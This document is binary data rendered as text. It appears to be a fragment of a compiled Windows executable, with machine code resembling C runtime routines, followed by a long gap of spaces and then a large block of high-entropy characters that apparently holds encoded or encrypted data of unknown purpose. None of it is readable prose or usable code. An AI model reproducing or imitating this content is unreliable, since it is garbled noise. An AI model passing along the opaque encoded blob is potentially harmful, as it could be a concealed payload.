���Y����v%�b����    3�^_]�������t�V�;���Y��t�VWj �5�������t��ҋ�U��QQSVj8j@�������3ۉu�YY��u���K��   ;�tAW�~ ��Sh�  �G�P�����O���g���8�_̍G��G�  

�G�
�_ֈ_�;�uɋu�_S�S���Y��^[�Ë�U��V�u��t%S��   W��;�tW�Ȑ��8;�u�V����Y_[^]�jh�x�'���}    r!�b���j	^�0�<a���ƋM�d�    Y_^[��3��u�j�^���Y�u�������}�9E|94���u1�����������uj^�u��E������   뢡����@���G뻋u�j�L���YË�U��E�ȃ�?��k�8���P�Đ]Ë�U��E�ȃ�?��k�8���P� �]Ë�U��SV�uW��xg;5��s_�Ƌރ�?��k�8�����D(tD�|�t=�  ��u#3�+�t��t
��uPj��Pj��Pj��|������L�3������� 	   ������  ���_^[]Ë�U��M���u�����  ����� 	   �C��x';��s����?��k�8�����D(t�D]�袻���  譻��� 	   �_�����]�jh�x��%��3��u�E�0����Y�u��E� �8�����ǃ�?k�8�����D(t!W�O���YP�x���u������*����0�6���� 	   ����u��E������   �ƋM�d�    Y_^[�� �u�M�1�B���YË�U���V�u���u����� 	   �Y��xE;5��s=�Ƌփ�?��k�8�����D(t"�E�u��E�M��E��u�P�E�P�E�P������菺��� 	   �h^�����^�Ë�U��j�h�d�    P��t�t�3ŉE�SVWP�E�d�    �E�Ћu��?�]k�8���u��]ĉU������M��D�E��EƉE��p��{ �E�u���
����C�u���@�E�3�����E��ЉU�;E��  �}�3ۉ]��}���  ��EϋE��]��E�   �����M��4  ��.���8t@A��|��}�+��Eԅ���   �E��M���.��E�� ����@�E�+EԉE�;��  �Mԋ��u���D=�GF;�|�}���~W�E��RP��*���Mԃ��}��Ӌu�����ǈ\.B;�|��uċu�E�E��M�3��]��}�Q���]�@P�EԍE�P�E�P��
  ������  �E�E��U�����A�M�;���  �u�3��]����]��M��U���@QP�EԍE�P�E�P�
  �������  �E�E��}�H�   �d-��t�D.����uĈE���E�d-�E�jP�F�E��
�@� f9H}/�B�E�;E��?  �učE�jRP�����������M  �E���u�jR�E�P����������-  �E�SS@j�EЍE�P�uԍE�PS�u������� �Eȅ��   S�M�QP�E�P�u��t�����   �UЋ�+M��F��E��F�E�9E���   �}�
u<jXSf�E��E�Pj�E�P�u��t�����   �}���   �F�F�F�UЉE�;U��o����y��~&�EЋuԋU�����ъ�C�L2.�M�;�|�u~�J��~��u��E������ΈD.C;�|��׋E��
�L.�E������L8-�E�@�F������ƋM�d�    Y_^[�M�3��g"��������̋�U��QSV�u3�W������}�EǉE�;�s?�S�q  Yf;�u(�F��
uj[S�Y  Yf;�u�F�F��;}�r������_��^[�Ë�U��QSV�uWV�U  Y��t`����?��k�8�����|( }G�u�~ u���	����F���    u�����|) t�E�P�����t�l���t��2�_^[�Ë�U��  ����t�3ŉE��M���U��?��k�8S�]����VW���D�Mщ�����3����������;�ss������������;�s�A<
u�C�F�F�E�;�r䍅�����M+�������j PV������PW�t���t������C;�r�M������;�r�������M���_^3�[� ���Ë�U��  ����t�3ŉE��M���U��?��k�8S�]����VW���D�Mщ�����3�����������u������;�s%�����
u�Cj_f�>��f����E�;�r׋�����������+��Mj ���������PV������PW�t���t������C;�r�M������;�r�������M���_^3�[����Ë�U��  �����t�3ŉE��M���U��?��k�8SV�����uW���D�M�������3������������;���   ��������P���;�s!�����
u	jZf���f����M�;�r�j j hU  ������Q��P���+���P��Pj h��  �����u�� ��������tQ3ۅ�t5j ������+�QP�������P�������t���t&�����������;�rˋ�+E�F;������F���������M���_^3�[�����jh�x�����u���u�E�@$�`  �@�@	   ��   ����   ;5����   �����ƃ�?k�8�M������D(toV����Y����}�3ɉM������U��D(u�E�@�@	   �@$�H ��u�u�uV�^   �����}��E������
   ���6�u�}�V�G���YËEP3�QQQQQ�@$�H �@�@	   �EU��������M�d�    Y_^[�Ë�U���0�M�E�E��M�S�]VW�}����  ��u*3��C$SPPP�C P�CP�C   ��T��������  �ǋ���?��k�8�u������EЉU�D)�E�<t<u���Шt��E�3��D( tSjVVW��  ��SW�����YY��t@�E���t#��<�  �u�E��u�P�N��������   S�u�E��u�WP�a�������E������E�|( }O�E�+�t5��t����   �u�E��u�WP��������u�E��u�WP�������u�E��u�WP�����׋L�}�3��V���E�P�u��u�Q�t���u	����Eԍuԍ}॥��E��uh�E���t,jY;�u�C�C	   �C$�K ����SP�ٯ��YY����3��E��M�����D(@t�E��8t�C�C   �C$�s �W���+E��3�_^[��jh�x�����e� j�պ��Y�e� j^�u�;5��tY�ą����tJ�@���$t�ą�4���  Y���t�E�ą���� P�Ȑ�ą�4�����Y�ą�$� F��E������   �E�M�d�    Y_^[��j苺��YË�U��V�uW�~�����t%�����t�v菱��Y������!3��F��F_^]Ë�U��M���u�ˮ��� 	   �8��x$;��s����?��k�8�����D(��@]�薮��� 	   �oR��3�]Ë�U��M�9 u3�@��y ujX�3�8A����]� ��U��Q�u�E��u�u�uP�(  �Ѓ���w�M�����  v���  �E��tf����Ë�U��QQ�} SVW�}�?��   �]�u��tkW�M��e����u�uP�E�WP��  �Ѓ����t^��tQ�M�����  v+��v3��   K���M���
���   �  f����� �  f������u��]+u���;���g3�3�f���E�8�E�@�@*   ����FW�M�3�������]���tǃ�uF��M�WF����S�uPWj �  �����u��C�C*   _^[�Ë�U��M��u3�]�S�]VW�}���B���w�� �3���F���w�� ��+�u	��t��u�_^[]Ë�S��QQ�����U�k�l$���   �t�3ŉE��CV�sW���|������t)��t ��t��t��t��ulj�j�
j�j�j_Q�FPW��  ����uG�K��t��t��t�e����E��F�����]��E��FP�FPQW��|���P�E�P�$
  ��h��  ��|����
  �>YYt�J�����tV�g���Y��u�6�  Y�M�_3�^�r����]��[á�Ë�U��QQV�uWV�������Y;�u�E�@�@	   �ǋ��Q�u�M�Q�u�uP�d���u�u���P�%���YY�ϋE��U�#�;�tËE��΃�?��k�8�����d1(�_^�Ë�U���u�u�u�u�u�d�����]Ë�U��Q�:  ��t�E�P�EjP�]  ����tf�E�ø��  ��jhy����u�u���u#�E�@�@   P3�WWWWW�N��������@�F���$Vt�(  Y��3��}�����Y�}��uV�3   YY���}��E������   �ǋM�d�    Y_^[�Ëu��}�V�����YË�U��V�u��u#�EP�@�@   3�PPPPP�M��������[�FW�������tB�uV����V����������uV�����YP�5  YY��y�����~ t�v�f����f YV�T  Y��_^]Ë�U���(�M�Vj �~J���E�P�u����YY�M؋��J����^���������������̃=�� t2���\$�D$%�  =�  u�<$f�$f��f���d$u�  ���$�����   ��ÍT$�M���R��<$tL�D$f�<$t�-X]�  �t^�   �uA������=� �l�����]�   �i����   �u�ԩ�� u�|$ u%   �t����-]�   �"�������� uŃ|$ u����-�`�   �=� � �����]�   �����ZÃ=�� ��  ���\$�D$%�  =�  u�<$f�$f��f���d$��  � �~D$f(�]f(�f(�fs�4f~�fT�]f��f�ʩ   tL=�  |}f��=2  f�L$�D$�f.�{$��  ���T$�ԃ��T$�T$�$舰�����D$��~D$f��f(�f��=�  |%=2  �fT�]�X�f�L$�D$�� ^�f��]fT�]f�\$�D$Ë�U��E�  �` �E]Ë�U��E�  �` �E�@�@*   ���]Ë�U���(�t�3ŉE��M�ES�]V�u�M��E�W��u��3�3�B��u7��}؋M�E3�f9Fux�A�M��x1��t�É3������?  ���M����#��} �}�u�j�X�#  ��$�<�u����$�<�u����$�<���   �j��Y+Ȉ}����J��#��%�~��ǊN,<��   ����   :���   ���E܋E9E�s�E܉E�}�+}��}�;��}�s'�E�@�E��E��$�<�u~�Ã�?��ЋE9E�r�;E�s��f�F�E*����f�F�,����� �  r����  v<���� w4���E��   �E�   �E�   ;T��r��t���V�#U�R�(����	�u�V�1���YY�M�_^3�[����Ë�U��E� tj��t3�@]ètj��tjX]������]Ë�S��QQ�����U�k�l$���   �t�3ŉE�V�s �CWVP�s�   ����u&�e��P�CP�CP�s�C �sP�E�P�  �s ���s�^���Y��������t)��t%�CV���\$���\$�C�$�sW��  ��$�W�  �$��  V�  �CYY�M�_3�^�����]��[���̋�U���$3�AS�]V�����t�MtQ�w  Y����*  ��#E�tj�^  Y����  ����   �E��   j�<  �EY�   #�tT=   t7=   t;�ub�M������(a��{L�H�M�������{,�(a�2�M�������z�(a��M�������z� a�� a�������o  ���f  �E�\  �EW����� #�����}�����D�/  �E�PQQ�$�L  �U���� ����U��������}
3���@��   ������Au�E�   �E��	�e� 2��E��E�2Ƀ��E� ���M�f�E����;�}B�}�+}܋]��σ��M�t	��uC�E����E��}�t	��   ��}��m���uщ]��]��}܃}� �E�t���U��U܋}���U���u8M�tK��������t=   t=   u/�E�4��E�����}� t�}� u�E�t���}܃U� �E���E��E��M���t���j�I  Y���_��t�E tj �2  Y���3���^��[�Ë�U��j �u�u�u�u�u�u�   ��]Ë�U��E3�S3�C�H�EW�  ��H�E�H�M��t�E��  �	X��t�E��  ��H��t�E��  ��H��t�E��  ��H��t�E��  ��H�MV�u�����3A��1A�M����3A��1A�M�����3A��1A�M�����3A��1A��M����3A#�1A�z  ����t�M�I��t�E�H��t�E�H��t�E�H�� t�E	X��   #�t5=   t"=   t;�u)�E��!�M���������M��������E� ���   #�t =   t;�u"�E� ���M�������M�������E�M��3���� 1�E	X �}  t,�E�` �E� �E�X�E	X`�E�]�``�E��XP�:�M�A �����A �E� �E�X�E	X`�M�]�A`�����A`�E��XP�  �EPjj W����M�A�t�&��A�t�&��A�t�&��A�t�&�A�t�&ߋ��������� t5��t"��t��u(�   � �%����   ���%����   ��!������� t��t	��u!��#�   �	�#�   ��}  ^t�AP���AP�_[]Ë�U��E��t�����w詞��� "   ]�蜞��� !   ]Ë�U��M�� 3�9�^t'@��|�e� h��  �u(�   �u�����E ���Ë�^�E��tՋE�E�E�E�E�E��EV�u�E�E h��  �u(�E��E$�u��E��.   �E�P��������uV�8���Y�E�^�Ë�U��Q�}����E��Ë�U��QQ��}��M�E��f#M�#Ef�f�M��m��E��Ë�U��M����t
�-�_�]����t����-�_�]�������t
�-�_�]����t	�������؛�� t���]���Ë�U��Q��}��E��������U��WVS�M�tM�u�}�A�Z� �I �&
�t'
�t#����:�r:�w�:�r:�w�:�u��u�3�:�t	�����r�ً�[^_��3�PPjPjh   @h�_�`����Ë�����u��������3������á�����t���tP�\�Ë�U��Vj �u�u�u�5���H�����u-�����u"�����s���V�u�u�u�5���H�����^]�jh0y�i���e� �E�0�H���Y�e� �M��8�q�����ǃ�?k�8�����D(tVW��   YY����F�F	   ����u��E������   �ƋM�d�    Y_^[�� �u�E�0�����YË�U���V�u���u�E�`  �@$�@�@	   �t��xK;5��sC�Ƌփ�?��k�8�����D(t(�E�u��E�M��E�E��E�P�E�u�P�E�P������(�E3�PQQQ�@$Q�H �@Q�@	   �|>�������^�Ë�U��VW�}W�����Y���u3��N�����u	���   u��u�@`tj�����j������YY;�t�W����YP�\���u������W����Y�σ�?��k�8�����D( ��t�uV�B���YY����3�_^]Ë�U��E3ɉ�E�H�E�H�E�H��E�H�E�H�E�H�E���]�������U�������$�~$�   ��fD$�    f(�f�fs�4f�� f(�_f(�_f(0`f(%�_f(5�_fT�fV�fX�f�� %�  f(�Pef(�@afT�f\�fY�f\��X�fY�f(�fXƁ��  �����  ��   ���  ��*�f���
��   �    �� D�f(�`f(�f(�`fY�fY�fX�f(�`�Y�f(- `fY�f(�`fT�fX�fX�fY��Y�fX�f(�`fY�f(�f�fY˃�f(�fX�f��X��X��X�fD$�D$���fD$f(@`��� f�� �� wH���t^���  wlfD$f(�_f(0`fT�fV���� f�� �� t�h`ú�  �Of0`�^�f``�   �4fP`�Y���������������  ���  s:fW��^ɺ	   ��fL$�T$�ԃ��T$���T$�$賠���D$���fT$fD$f~�fs� f~с��� ��� t���  릍�$    ����ƅp����
�uJ�������$    ��$    �ƅp����2������+  ������a���t������@u��
�t��������F  �t2��t���������������������-�`ƅp����������ݽ`������a���Au����ƅp������-�`�
�uS��������
�u����������   ����
�u���u
�t���ƅp����-�`��u�
�t��������R������#���X��ݽ`������a���u���-�`
�t���ƅp������������-�`ƅp����
�u����-�`������-�`�ٛݽ`������a���Au�������ݽ`������a���������ݽ`�������������ٛ���u����`�����ٛ���t�   ø    ���   ��V��t��V���$���$��v�  ���f���t^��t�>���Ë�U��QQSV���  Vh?  �����E��YY�M��  #�QQ�$f;�u=�z  HYY��wVS�i����E�a�E��;S�����\$�$jj�������?�.  �U��E��������D{�� uS�����\$�$jj��V��S�������E�YY^[�Ë�U���E������V��Dz	��3��   Wf�}�ǩ�  uz�M�U���� u��th�پ�����S3���AuC�EuɉM��y���M�N�Et�f�}�U���  f#�����f�}[t	 �  f�E�Ej QQ�$�1   ���#j Q��Q�$�   ���������  ���  _�E�0^]Ë�U��QQ�M�E�E%�  �]����  ���f�M��E��Ë�U��}  ��Eu��u@]Á}  ��u	��ujX]�f�M��  f#�f;�uj���  f;�u�E�� u��tj��3�]Ë�U��QQ�EQQ�$�  YY��uJ�EQQ�$�l  �E����YY����Dz+�`iQQ�U��$�I  �E�����YY��DzjX��3�@����3��Ë�U���E�  ���  ��9Mu;�} uu��������z����� a��   ��������A�E��   ������   9Eu;�} u5��������z�������   ��������A�E��   ��� a�   ��9Mu.�} ��   ���E������A�s����������E{b�����\9EuY�} uS�EQQ�$�������EYY�ы�����Au����� a��u ���������z��u���0a�����E�3�]Ë�U��QQ�E���]��E��Ë�U��f�M��  f��f#�f;�u3�EQQ�$�����YY��t��t��t3�@]�j�jX]ø   ]��Ɂ� �  f��u�E�� u�} t��Ƀᐍ��   ]��E��������Dz��Ƀ���A@]���Ɂ������   ]��������������U��E3�SVW�H<��A�Y�����t�}�p;�r	�H�;�r
B��(;�r�3�_^[]��������������U��j�hPyh�-d�    P��SVW�t�1E�3�P�E�d�    �e��E�    h   �|   ����tT�E-   Ph   �R�������t:�@$���Ѓ��E������M�d�    Y_^[��]ËE� 3Ɂ8  �����Ëe��E�����3��M�d�    Y_^[��]�������U��M�MZ  f9u�A<��8PE  u�  f9Hu�   ]�3�]ËM�d�    Y__^[��]Q�Pd�5    �D$+d$SVW�(��t�3�P�u��E������E�d�    �Pd�5    �D$+d$SVW�(��t�3�P�e��u��E������E�d�    �V�D$�u(�L$�D$3���؋D$������d$�ȋ��d$��G�ȋ\$�T$�D$���������u�����d$�ȋD$���r;T$wr;D$v	N+D$T$3�+D$T$���؃� �ʋӋًȋ�^� ����������̋D$�L$ȋL$u	�D$��� S��؋D$�d$؋D$���[� �����������̀�@s�� s����Ë�3������3�3��̀�@s�� s����Ë�3Ҁ����3�3���SV�D$�u�L$�D$3���؋D$����A�ȋ\$�T$�D$���������u�����d$�ȋD$���r;T$wr;D$vN3ҋ�^[� ��������Q�L$+ȃ����Y����Q�L$+ȃ����Y��������U��Q�=||f�}� �t	�}� �uT�]��E���?��t?�  u��  ��é  t*�  u��  ��é  u��  ��é   u��  ��ø�  ��ËE���������̐���m�q������̋M���������̐���m�T���������̍M��������̐���m�4���������̐���r�!������̍M��������̐��s����������̋M��h������̐��pn�����������̍M�����M�����M��x����t����m����\����b����D����W����,����L��������A���������6���������+��������� ������������������
��������������l���������T���������<���������$���������������������������������������������������������������|��������d����{����L����p����4����e��������Z��������O���������D���������9���������.���������#�������������t��������\��������D���������,���������������������������������������������������������������������������l��������T��������<����~����$����s��������h���������]���������R���������G���������<���������1����|����&����d��������L��������4���������������������������������������������������������������������������t��������\��������D��������,���������������������v���������k���������`���������U���������J���������?����l����4����T����)����<��������$���������������������� ���������� ���������� ���������� ���������� ����|����� ����d���� ����L���� ����4���� �������� �������� ��������� ���������y ���������n ������̐���o����������������̍M��H ������̐���n����������̍M��H ���M��  ���M�� ����x���� ����`���� ����H����������0����������������������̐��o�����M�������M�������M������M������M�������h���������P�����������̐���n��������T$�B�J�3������u�������T$�B�J�3�� �����u�������T$�B�J�3��������m�w������T$�B�J�3�������<v�Z������T$�B�J�3������hv�=������T$�B��|���3������J�3�������m����������U��py����]��U�칠y����]��U�� {����]��U�칀{����]��U��0z�s���]��U���z�c���]��U�칐z�S���]��U��xz�C���]��U��{�3���]��U��Hz�#���]��U���z����]��U�치{����]��U���z�����]��U�칰{�����]��U��P{�����]��U��`z�����]��U��h{����]��U��8{����]��U�침z����]��U��z����]��U���{����]��U���{����]��U�� z�S���]�                                                                                                                                                                                                                                                                                                                                                                                                       @ �   P � � �  @ p p � �   0 ` � � � � �           ��A���        ��	�                        d�  5 . = ӫ  @  kS _    bm  O[    ��  r  �y ��  C_ 7y  ;<?">?;@AkX<_.#d,c]_I/70zIkJ5	$ .$ 4"	*
&8% 7*+2/;_7z""z.-.&r<7:7"24.,	-!$ 
-=k'%"S5(46!6;#3+.1/
51=1 (?5t.2)#b7;.-+ &!7J<?=%{+/$-)2<>!>9,;./.G1^Fe46:jM[zIkJjW&0P|Ql "4;8Hjw@{,c`u-'  vUfs%{=_ E
.V7'6#BJfh
\"_p>%(X?4 %8:&]_M}	0&"o5|_<2>.$ 'i/8u 2S-|]{z+(` %!NYDeJ.0'_F5r3d#(85f~vI&699)!&2.=#62+$?0"6	a9+-{E 0/Z{;>5?2!#?9#&8=(7{n,eYDe0	f "I dZdd9<+(X^8=ZzCP!33(&[1?+-8!vNyu>JrZx5wiD>a0x$7#95s$$2/.
6#"DeJD)43\$

	3p,3(%1Y$6Cc]_My|S&2/4>Vg@Jnl-)/ow&d~H6,$y#3g}*r[|\A`8|#DeJ@*
59$r	,$ =S"	]	sF$AGZ_7"5z}?_Myj#< -UvV4i
n%_	lk-w#DciQ+5&[7-+,&558%>MxYDeJ.'$ pUCu0"g3BJf~aN>6=.XY(]6"9 13 [gn2Md, y{90nlwZ`Pp%# &w,%$ttA;4-{j"}eE3rS*.7'I,d-1y;f~vW.6/%$55S ??^NoJx M #*d,7^u ."26c2,[c/03 7(<]
:*(''Y:!&fh4_<$";"04-!5 C=e	J|,Ny:
5a2'j1	K #9!3j}!:>:br;.z=[A^*_4:0)U `/=U@A35Y)1%D<IG}y9<!2yjM[lW5|_1	Xgg?Ju/CiD`VeHe[c np?6,< 7:&!0";"x! )y9,;*6 	2%.,%'4-2;>#?>6$"/j?80>,=6d&.2),68a58;V9 ===;2BYz/0' -5'&
nM%)$/;./7\!?/;!-VCtD$9qSF/u=j1($>,( `78;;	(=&|A4a+!8+;Z 33;-)=W0"1^&>"? e7N&$%,\,%d)8S9t(5z)/!7.,>-
/A2gwiDf+HjwRL17	;<B?$:0#W5 *%&F/xy6(!!/\O	6'8]/94#'+31#7Q82#$/C`6&74,1 "	*yP *&t00!'odH(e+&$42U74
 ,M+>0<_<<(&!0#yD&a_^#$/<V=)z+%'-*$&%?q+2*x=,>Q
>'*$&zRS>&<R{)1=5V6(*=4-'80#['<2#5))(/4 ^ 0d~L"(|]{a?	\A``$Opy'--5{-,)?#	r	2'W1 I,5)"X$U$)? :vM[z_p(33t?$s^<Qq+(4
:_6(9Q8|]{m}?!0?i=<!DeJ@0VidZdr%3.:a:%+,X31.<
2=}bc];Q. =M V&)0= 	`7
	-#"%&3 "+6*38 *4,^#%=
4

',$9,;./6(/)4$IGf&&31#?=</-,,'2*7'"	*
&&?3,#::&i;!)$#5
'2$0?/. &>9,B?V28/)7>#=G
='&4 rB,$	
-)
0&	/%|$P0o5&   86<
(397*4+9#%7'?/, 013<%,<-0)7) 71# 01#  Z3"1;4"	95 
<"17";!+
2%!&r#-2+1/#7"
;	}y!d
+.;.1$E- -4*L%rJ"T;4 
{/--?a-
"L,7#:/+8#p-$:p0?E	11?94B8]|4+-*=g 8*[23F.
U
-y+"wiD{(7
5=3,?K""*?7$|8=y 49S'^lIh*&	&1~>\&>,,[|=($6%31#?1I}U%N,.]0tkE+}wiS
>-eH5= *=20`)% \$:$s$:<`I>)>=lK8"s>9+_;9
{31#2&3#
9T1Z'2?%3%8+3 _a :6}b;7*y0" )V*VC3<C0>x	a(C8%',75T+$912y5:#%$4%y(	0Z
 1=?8cvk#Wy@kD0"1<|>n89=:<x+ )5$"XF ; 
',"9vA.0==;;3/6)&>1#+ d_w*<S2,) EQ
),?	j	 /=,?K5;44289%3a.qG-3^+''6?Z"I!</>;!,>O ; 4~_5 05;q?/0\>:2%a($'-u>!"aS>U5C
&>%&c8l&	3& 01Q>&`3
	29,;,>,
6%##&M"5 ^  .)Lx7-' 7HFY,%%0-?9!8-' $RlU/B$dT.&
59+
>X2 /)&<]>P3y9)Q2*5a',w->0/?J7-aai*%5?"1<|A-x7<8 $ J/r>O  9':	>!;.(;?2=;5-@7,33 *A4.$,,#`$/390!5-8$:>"	jZ"5 6e?Y]: 2,6 #-2(>::6pXZ6\!:I!`c")%c!	-/7
gW	8'+_
U,$|#:!)j _w<+I!*
$,I>Dr  /73W	=-F1V	?,& 6%&#5S"2) .#o<&g9'50s8&7 2,/#a&&f5y; +/ $''21/3 <
',0 h;$+9>/-')834+g&=&'-T7=+f-6
y*a>?)a1<>$#34k'V~K+%7*$. HI
 Y,,*54.6:?? ` ]9~99:d!'u&?F0-#6	@Pp{?8^,,a kcfv "\+0	."<:8y53e!0V/6N;0&'5|L' O0#C=!>k,$(!"35?2"V!64g
<3p!74"	Rd!1w?!!=du$)81= +D(!0I1 s3   
=N	=		4X	<$%Vbu0!:J2|& 4"}-/1),Hu 5/*2?@=)30[$7!/V?x }f!=.& <;Au/-PD*6G(;>*?M<*"*	+Q '&-=+c &v0| E&"~-c&'%<e #3E& ,xb+,-$T882=	9#1x]MyS20u?.i.$(s38&S#/='?sVe^7#<=	Z=5|b /3xD
')&I.4!'02d4,1+$9::\L^+%G*% 
%A;?|Z0=+]0!%#"6>Z|.2r3dd'Hj1J [0-06,,
&`d>1~&, '&2%lI8 <
2'P#73SBUV_w{^  y<4(*0b /6Q/.]$4+4
'-2?*r0!Je	z:j5 :0L7*&?:$! ]{
de3 9,9#<8=A?$93*<"#5'$?/X%^=y"+-")<=&j:?"{;j;:c+^#o5,? -$90{2G#w&z4	,$1T<@'F(X;&2.	)39S2Md"];<h'}VT
`4$:w$~ " !:<=(ydfz0^,2%:
/60BP++5:L./6(-8.47#<:L }T 'DJu^!z^	$ ?/ 
4+j!=d:$,k0 9m;D(!0I1Y"Es
T/2/.3!2C6G}}4#4g'5'$E3`1ec@Q7a%|Lg ,+#	T=:1"d'(;/';	::=6%!9_lI\01
^#,$ ";9TU'"3PAGZzCIG;}?+Q"
6,$",4 u^"?%pDd&H#wV.>2;! &0(8}l+7/yJ@>0413@ g'/,:7D>kX*
,1	<!#+^VjAL|" {;%;r* <L$3$759m1
7*V5/9_XY~|%dB&'?TU@E7'*[XC'M,=;.:#6MzI}
8o+(r,*9vdh%$2#Se|]#j-	c'Z"	cjUf{%&b^l_P1rdZr:/_3jWBB-6(/)?$-/ZbE_Mg	M 02}JjA+1ac@Q4n%|Lgl2%:%08&66*e%}2-{ <=.I^W1%zd/Bv?>@
F
9:7
QG}|y':'?#"B1c)+4U	*5#!;(3;j~	|`&7`|vIYX(@z$
3,!Yy6|3-,#;~9;=3<)Y7=946)#4+= * %>=1/*	1-=!{#k+289%3:)q}YDe0^"W!	67
4`"Jf~m? AkX?]u{]_M75
*4-~,.(4L)3/,.e[j,7"2>`>7J&3|(#{^lM%5 r
?U4 !7H"#]Wp'AGaZ-`bcY>5[z_30`ycsA;%'<)+jwR-%=!3$R&2/+2:(f^h(6!,7*de38JzW^/"Aw" A4]2u"15#_,"<5-? h'^	2!:"21?z a141#+$+#a{5$>xE'rV>u$
xf/;
z0?53?"$$\6$*37/E,x5wZ(L/"8: */a&[]{<qc"~{#e	!  %	#&<dZ$$(b/X" >1  C4]
g+ 7'2! 7:yl ~%w
 	0&.<*83=<-<4\]w`7Bfe]!8 	$P2qdZ`}/Tf	2[4@kXQ*P%I.:9</3Lc76\q,ZrJ>|-
ls^#R	/ X; Q`3!|	:@]w&f1q/2]=(Z.,?Y"-:_\J85SBU@6(N9>&?")u HS	U=#o#< 5z.$ 61.!	6<0,78#W9;e"6+;01^	3e:"
8$E'
T4=/>
y7:
=<6D'2.	:!<
	;$;c]Dn+ d"w$ +1aDd$'?@7<zHjw#%B"bzju?f9##4-:3 2;S@'*M:"&. 09,_6|>]P=&9''/&1#!83=+#+*?@p 6v)y3:"?qwJ*'${w(	2(??d3OZa*x^%IlN/.W?i7;.;-8-\* 90"
91##e>|]Mr2:.*2 4"	2Z'L7H20%"<% 8@P	/:>?"|(?0%55U9#8%:9*< 9*1<T< 
6* R}5\=;w-|Sm <<'3&07'E":+	*g'9$[0^654
	,4`1V	:B:=8+V&
?@>,0W}JZbg'2p7>8,<%`H#$r d?3d!+&Y1BW) 5.6}("	r"6&vd6,!+5]`-0VXZa!<	}&7"2#0.1`Y{6(-w4Tg
/:^5b:`+;$8:a;sF(0774 7zs
y*!?}h3 ,_	X:4' k;2#53#$'r~Z4{n%v2!	(?'_=~&7cY>2.k/`?3">5*&?9Q4'4C	1!.$i
>V?+/#)Z<U-	3.5M`
.  h4"v*	e^20(953bu(8W
8v(+E (>0 
)O7"MydnB2`,;.! Y8)'){y1&j3cP'q8+!y$4	|d72,_G$3-+b2(;d-~/Y@0J 0;6{'!4| )-`C"kCF	+%7C'&#b0 	Z6j=7  7~2/?w &5*;0 Ll#:d:3c.qG*0$>$&V:/6~73|o$'3:F,,"&:h!'+y*E,##-7($V42?.56239z({)N	8:?/'f	?)k	+/$-q82l767/~

4
 9$7WW8A)=/
0-$. 6+C0\9e0 &C99&#$d+=!9# -k%e.AT$)4`<	x6k8><Z	8fM? $31!;
:^35 $r*u)&rRV5*13zA 5<l 
/Y>~I&?6:i>4'#n,)f 5XI
;&;)5,.'Y:
 a!V6m(+3482.\u{s Y{d7L5)/
;G'#q&J|{25i;s]sQD{^: >t=#|a-A'6-7 ) :	0f<-I)nvVF95+2^`1g+(8
'	.u[!H6?}({6B22g|@_63enC( 1*e-{9)625%3
,(iS8>V8W.8>'*6*0_ n#f5=/C~#x`}P&-3D=c0>W/]=?945(`=z~D /8 I%8Z:b""0i;!7+-3?,;*$CG3;-3F+(@'}&:!y*)P3"
7p*
?+K#7s+z|?v;(m.0~8#~>	h''Y.M=1y/""! kX! -:,M$e5|] gr:Dl+748h!.k0%w>3dv<?)J{7
[:87.6/bE^	<5_'@2%,
,B764U]W|'Y?>7,k9:E0,	_frJ#=##,#43%$?*2;A%c j|+) !?}OD(4
7+6  2!1%y)\z`k	
*W\,10>8@0^IC/3Ic(#-0S,9+
4)42;$"7e^qsRe+-K}"?c7/<a
;xY'<W&t_5V#9%s` SZy??4>%'4U_1#6>=)v :% Up5;64p= D{dfk@} <1c"'st]1*/)<7:5.b/:467>;M
/~));\}%%/){>28+!y>:T&.L!3"N +&6 
"0$h?7'	a[`Kf>$"]%x2("6i9z;&<|%&''-%s
:
	n*:?'
6(:9 =xEI:;$_s6EL&"'5)r,#'T4/1r2#i;(L3m`r;$!f **4d23.A,7Z?&W503/<.5V +`:/)8V8[$:"CP$ We*[_p&52cW~+*<,M/P%6Ee"	$1G4x;m7/e/%/6N$<(eU*&k8. ?/h^T>$
'37';,\8&c\9D96';	`wVeUF:6'nR!:	!"" 4!9.%U-(!:u{@x&"5%%	/8#,\" 0-5z>',c&=z +j:+ Jh34Z":=#q+Pe3, &?d8&7n8"!5HpW%-
s	O/*2!(*#9&'(z$R;![?m)Wu#*'1| v/%5c>q_b 0
O&,Aj l/7?R)'.
=2U& $"24m9#/5*Y +`LV/$0U15 "G_0I-Q<02E)W &:L
P&-sD,	Oa+{9:'fv#.(#;*<{<6f%S81+t$@	-
"0".<&!&g=`-'y$>]U7n$,$.?V#c  j%w@;Lat)$,mR<S  &g21
u."1XW 	g#i|: }9F<u9x/'!'/;!'X,Y&,<.;.:"UduVg3!XC/6zN 9=	w
(%s)+^ =Jb#$/<&	C><a;!u0
O.3VRbM(87#/4.*<eu2$$#,"+,+V17$za>g?^f$^rL=d2=|&j6D_63B97*zZ5h42 3 7,AO^$9)[>Z$&K=,vP0TJp';#'+7/0dp]'"W-;=!#2"3,s+tS%V?-7;vIs$)
Q_>=7^7<;7<4-+;M"<_7<{Jg1'-k!}<2- um,y//<0*~_t(V! '
F7@-96za+%|));Q-]=(']7?'/!Aa/D$27g)!,a
g-/r+2073:g ",y7< .4'p,tiZ233U=8<K7=G4%l-4;KA#7+$2* gv4+3%=07
>	w
/,9<c +j\dx% ,"U'DD8"$:6> 

0$q3.9 #+t#*:.+]7z{Ir5^R?ZR u!$7	4Hnt*e#1&0`>ln/n."7:,37_"Y0 '&57!s$['?
#?/$ha"% 't1Fn86n	M;QN2;/{)`		a8;~;12Y7`}>2"%'"S-27,6=#{I=1z6-+^	\;<9ZI+#;)B11Q"V/ 5[
 :4M)2s19.'r)21_&$#O88"\~C*%267d}3+p<(B8:%G7";z$I%+Va+o-9i&.;94'>w\<7&d'!<2X;}56Q(D"!$"@F1Z= #7>N$<
-/)$2/*  &J .%&z^469' ;0=M4TNr1 ;.%:)-'r#*yDv7M#-U5pb(;
E=#8fz?"4%"U?I3^n `Qt4,.?]	,+=+8=$1**=Jd798&V:.0u"B7	3M?M21!5.6"8&`".3&%7T$_'!6(-15a!<q/1>{!0B7E$j\#N,)G.-&""!XO1d|W NpLW#6/1Z7 k5.D7*56W29@ y 8x	5)e$O(>6:=")$0w4=iU5*;:R9*%A<!.,!>
$,,V,
%!"*9W0334/a\5:1w:# 9T2AH.A2`;-& 7!v=2 8@: RV;"V5$yC
|?^$f(&/FY
:2"$	5	tE<,0Ue#)}'V"8 0($Mv/)97?.}%<%7z
?=c/954"/*}'5qQtV6`^.y;<$f-,-!;) '8("?4!'2!_?^o +5)2Z(&=+ Xiy" 52_G",84;k"Y5d5"?C=x)}I4*DFd,. T;KB+W'EP'4y(c!27t''4Y&-)2w%!) `Je
